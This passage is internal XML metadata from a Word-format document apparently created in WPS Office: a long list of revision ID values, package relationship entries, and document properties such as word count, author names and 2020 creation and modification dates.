    <w:rsid w:val="54984A37"/>
    <w:rsid w:val="54A0262A"/>
    <w:rsid w:val="54A673C2"/>
    <w:rsid w:val="54AD7CD0"/>
    <w:rsid w:val="54EC013A"/>
    <w:rsid w:val="54F70513"/>
    <w:rsid w:val="55792043"/>
    <w:rsid w:val="55B153E7"/>
    <w:rsid w:val="55FC0E99"/>
    <w:rsid w:val="56037963"/>
    <w:rsid w:val="561048EA"/>
    <w:rsid w:val="561A1C7F"/>
    <w:rsid w:val="5641191E"/>
    <w:rsid w:val="56494932"/>
    <w:rsid w:val="56B3522D"/>
    <w:rsid w:val="56D14298"/>
    <w:rsid w:val="56E670C5"/>
    <w:rsid w:val="57125792"/>
    <w:rsid w:val="5781481B"/>
    <w:rsid w:val="57A021BC"/>
    <w:rsid w:val="57A02B33"/>
    <w:rsid w:val="57DB0D5D"/>
    <w:rsid w:val="58127135"/>
    <w:rsid w:val="581F6826"/>
    <w:rsid w:val="585B2D20"/>
    <w:rsid w:val="589B785B"/>
    <w:rsid w:val="58A23DDB"/>
    <w:rsid w:val="58A76F2D"/>
    <w:rsid w:val="58AB582C"/>
    <w:rsid w:val="59341977"/>
    <w:rsid w:val="5935202C"/>
    <w:rsid w:val="59447928"/>
    <w:rsid w:val="59A473CB"/>
    <w:rsid w:val="5A0E3C4B"/>
    <w:rsid w:val="5A256A13"/>
    <w:rsid w:val="5A7D2E66"/>
    <w:rsid w:val="5A8318C4"/>
    <w:rsid w:val="5A9037C4"/>
    <w:rsid w:val="5AAE4D5D"/>
    <w:rsid w:val="5ABC1267"/>
    <w:rsid w:val="5ACB4FA5"/>
    <w:rsid w:val="5AF17180"/>
    <w:rsid w:val="5B1D748E"/>
    <w:rsid w:val="5B3E4922"/>
    <w:rsid w:val="5B774F32"/>
    <w:rsid w:val="5BDE62D0"/>
    <w:rsid w:val="5BF94868"/>
    <w:rsid w:val="5BFD24CF"/>
    <w:rsid w:val="5C4D448A"/>
    <w:rsid w:val="5C6133D7"/>
    <w:rsid w:val="5CC117A1"/>
    <w:rsid w:val="5CFB7B61"/>
    <w:rsid w:val="5D6240A3"/>
    <w:rsid w:val="5D6E0193"/>
    <w:rsid w:val="5E293C9E"/>
    <w:rsid w:val="5E4C163F"/>
    <w:rsid w:val="5E502FDE"/>
    <w:rsid w:val="5EB51E90"/>
    <w:rsid w:val="5ED06184"/>
    <w:rsid w:val="5EE53464"/>
    <w:rsid w:val="5F535E88"/>
    <w:rsid w:val="5F8914C5"/>
    <w:rsid w:val="5FCE5B7D"/>
    <w:rsid w:val="5FD05999"/>
    <w:rsid w:val="5FD77437"/>
    <w:rsid w:val="6057251D"/>
    <w:rsid w:val="608F7EC5"/>
    <w:rsid w:val="609B1D23"/>
    <w:rsid w:val="60CA2BBA"/>
    <w:rsid w:val="60DB6499"/>
    <w:rsid w:val="61467913"/>
    <w:rsid w:val="61531BF7"/>
    <w:rsid w:val="61963B1D"/>
    <w:rsid w:val="62513574"/>
    <w:rsid w:val="62957AE9"/>
    <w:rsid w:val="62E11F68"/>
    <w:rsid w:val="62F67787"/>
    <w:rsid w:val="63050EE2"/>
    <w:rsid w:val="63730F85"/>
    <w:rsid w:val="638135E4"/>
    <w:rsid w:val="63FB7D13"/>
    <w:rsid w:val="64340862"/>
    <w:rsid w:val="643A35DB"/>
    <w:rsid w:val="64BB230E"/>
    <w:rsid w:val="64E76F13"/>
    <w:rsid w:val="65490492"/>
    <w:rsid w:val="658D54A7"/>
    <w:rsid w:val="65B33E0F"/>
    <w:rsid w:val="65CA20E6"/>
    <w:rsid w:val="660A14E3"/>
    <w:rsid w:val="66237D67"/>
    <w:rsid w:val="6642267C"/>
    <w:rsid w:val="66743072"/>
    <w:rsid w:val="66D73774"/>
    <w:rsid w:val="6760569F"/>
    <w:rsid w:val="67627BCD"/>
    <w:rsid w:val="679570DA"/>
    <w:rsid w:val="68117429"/>
    <w:rsid w:val="68585625"/>
    <w:rsid w:val="685B313D"/>
    <w:rsid w:val="689E1A87"/>
    <w:rsid w:val="68A23759"/>
    <w:rsid w:val="68BC5060"/>
    <w:rsid w:val="68C223ED"/>
    <w:rsid w:val="68D31F1F"/>
    <w:rsid w:val="68DB2705"/>
    <w:rsid w:val="68E45CB8"/>
    <w:rsid w:val="69272B85"/>
    <w:rsid w:val="6A3E575E"/>
    <w:rsid w:val="6A5067C9"/>
    <w:rsid w:val="6A621C72"/>
    <w:rsid w:val="6A900707"/>
    <w:rsid w:val="6ACC403B"/>
    <w:rsid w:val="6B223F3B"/>
    <w:rsid w:val="6B25275C"/>
    <w:rsid w:val="6B4A4E45"/>
    <w:rsid w:val="6B521562"/>
    <w:rsid w:val="6BE5454F"/>
    <w:rsid w:val="6BEB064B"/>
    <w:rsid w:val="6BED21EE"/>
    <w:rsid w:val="6C5561E5"/>
    <w:rsid w:val="6CE366B6"/>
    <w:rsid w:val="6D2D7407"/>
    <w:rsid w:val="6D8A5D9E"/>
    <w:rsid w:val="6E101680"/>
    <w:rsid w:val="6EC75E76"/>
    <w:rsid w:val="6F1E78EC"/>
    <w:rsid w:val="6FAF5A67"/>
    <w:rsid w:val="70081734"/>
    <w:rsid w:val="700D29C8"/>
    <w:rsid w:val="70691AE6"/>
    <w:rsid w:val="70795E9A"/>
    <w:rsid w:val="70AF5BB4"/>
    <w:rsid w:val="712F7654"/>
    <w:rsid w:val="714235CB"/>
    <w:rsid w:val="716829F9"/>
    <w:rsid w:val="71822F98"/>
    <w:rsid w:val="719D391E"/>
    <w:rsid w:val="71E957AF"/>
    <w:rsid w:val="726D1E32"/>
    <w:rsid w:val="72752344"/>
    <w:rsid w:val="72C02620"/>
    <w:rsid w:val="72CB2DF1"/>
    <w:rsid w:val="73485963"/>
    <w:rsid w:val="737E18D2"/>
    <w:rsid w:val="73B27609"/>
    <w:rsid w:val="73C36191"/>
    <w:rsid w:val="74603567"/>
    <w:rsid w:val="74752586"/>
    <w:rsid w:val="74A104E1"/>
    <w:rsid w:val="752B33DC"/>
    <w:rsid w:val="753D143F"/>
    <w:rsid w:val="75912EC6"/>
    <w:rsid w:val="759D74DF"/>
    <w:rsid w:val="75B410AC"/>
    <w:rsid w:val="761D72E9"/>
    <w:rsid w:val="76827C53"/>
    <w:rsid w:val="76E96233"/>
    <w:rsid w:val="77187456"/>
    <w:rsid w:val="772611AD"/>
    <w:rsid w:val="773D3E4C"/>
    <w:rsid w:val="7750165C"/>
    <w:rsid w:val="77A40C29"/>
    <w:rsid w:val="77B2768D"/>
    <w:rsid w:val="77CC0931"/>
    <w:rsid w:val="77DE4AB3"/>
    <w:rsid w:val="78BC327D"/>
    <w:rsid w:val="78C9295F"/>
    <w:rsid w:val="78DD22AB"/>
    <w:rsid w:val="78FC781E"/>
    <w:rsid w:val="78FF0CCB"/>
    <w:rsid w:val="792325AC"/>
    <w:rsid w:val="79B74C9D"/>
    <w:rsid w:val="79BA34D0"/>
    <w:rsid w:val="79C46DB1"/>
    <w:rsid w:val="79CD6F47"/>
    <w:rsid w:val="79E01BA6"/>
    <w:rsid w:val="7A0F5769"/>
    <w:rsid w:val="7A2B2CA6"/>
    <w:rsid w:val="7A5417F0"/>
    <w:rsid w:val="7A5D7049"/>
    <w:rsid w:val="7A65280B"/>
    <w:rsid w:val="7A7B6E30"/>
    <w:rsid w:val="7AA53667"/>
    <w:rsid w:val="7ABD49A4"/>
    <w:rsid w:val="7AD151B6"/>
    <w:rsid w:val="7AF97A90"/>
    <w:rsid w:val="7B2611FF"/>
    <w:rsid w:val="7B5A6A21"/>
    <w:rsid w:val="7B803021"/>
    <w:rsid w:val="7B9B6398"/>
    <w:rsid w:val="7BB92C1D"/>
    <w:rsid w:val="7BF22AC7"/>
    <w:rsid w:val="7C043A08"/>
    <w:rsid w:val="7C0C791D"/>
    <w:rsid w:val="7C1F633D"/>
    <w:rsid w:val="7C765CA4"/>
    <w:rsid w:val="7C77156E"/>
    <w:rsid w:val="7CC2654A"/>
    <w:rsid w:val="7CD105F8"/>
    <w:rsid w:val="7CEB6EED"/>
    <w:rsid w:val="7D234786"/>
    <w:rsid w:val="7D330798"/>
    <w:rsid w:val="7D8931BC"/>
    <w:rsid w:val="7DDD4A7D"/>
    <w:rsid w:val="7E6C7102"/>
    <w:rsid w:val="7E6D6484"/>
    <w:rsid w:val="7EB5252E"/>
    <w:rsid w:val="7EBC3B4A"/>
    <w:rsid w:val="7F663FD4"/>
    <w:rsid w:val="7FCA2AC5"/>
    <w:rsid w:val="7FF02406"/>
    <w:rsid w:val="7FF92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5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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml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27</Words>
  <Characters>157</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>118</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>183</CharactersWithSpaces>
  <Application>WPS Office_11.1.0.10072_F1E327BC-269C-435d-A152-05C5408002CA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2020-06-22T11:07:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Pio</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-24T13:38:17Z</dcterms:modified>
  <cp:revision>17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2052-11.1.0.10072</vt:lpwstr>
  </property>
</Properties>
</file>